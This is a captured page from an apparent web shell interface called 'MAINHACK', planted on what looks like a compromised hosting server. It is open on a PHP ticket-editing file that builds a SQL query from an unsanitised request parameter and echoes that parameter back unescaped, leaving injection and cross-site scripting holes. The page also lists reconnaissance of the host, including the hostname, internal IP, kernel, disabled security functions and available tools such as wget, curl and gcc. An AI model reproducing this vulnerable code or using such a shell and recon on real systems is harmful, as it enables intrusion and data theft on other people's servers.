[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: edit_ticket.php
<link rel="stylesheet" href="css/datepicker.css"> <?php ob_start(); session_start(); $code=$_REQUEST['id']; include 'database.php'; $result = mysqli_query($con,"select * from user where user_id='".$code."'"); while($test=mysqli_fetch_array($result)){ $name=$test['name']; $phn=$test['phone']; $em=$test['email']; } ?> <div class="panel panel-primary" style="margin:0;"> <div class="panel-heading"> <h3 class="panel-title">EDIT HALL TICKET</h3> </div> <div class="panel-body"> <form method="post" enctype="multipart/form-data" action="edit_ticket_success.php" class="form-horizontal"> <input type="hidden" name="id" value="<?php echo $code; ?>" /> <div class="form-group"> <label class="control-label col-sm-2"> Name</label><div class="col-sm-4"> <input type="text" class="form-control" name="name" value="<?php echo $name; ?>" readonly /> </div> <label class="control-label col-sm-2">User Id</label> <div class="col-sm-4"> <input type="text" class="form-control" name="post_date" value="<?php echo $code; ?>" readonly /> </div> </div> <div class="form-group"> <label class="control-label col-sm-2"> Phone</label><div class="col-sm-4"> <input type="text" class="form-control" name="phn" value="<?php echo $phn; ?>" readonly /> </div> <label class="control-label col-sm-2">Email</label> <div class="col-sm-4"> <input type="text" class="form-control" name="em" value="<?php echo $em; ?>" readonly /> </div> </div> <div class="form-group"> <label class="control-label col-sm-2">Exam Date</label> <div class="col-sm-4"> <input type="text" id="date1" class="form-control" name="ex_date" /> </div> <label class="control-label col-sm-2">Time</label> <div class="col-sm-4"> <input type="text" class="form-control" name="time" /> </div> </div> <div class="form-group"> <label class="control-label col-sm-2">Venue</label> <div class="col-sm-8"> <input type="text" class="form-control" name="venue" /> </div> </div> <button type="submit" class="btn btn-success" name="sub">Submit</button> <a href="all_client_post.php" class="btn btn-danger">Close </a> </form> </div> </div> <script src="http://code.jquery.com/jquery-1.9.1.min.js"></script> <script src="js/bootstrap-datepicker.js"></script> <script type="text/javascript"> // When the document is ready $(document).ready(function(){ $("#date1").datepicker({ format: 'dd-mm-yyyy', }); }); </script> </body></html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 678.23 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619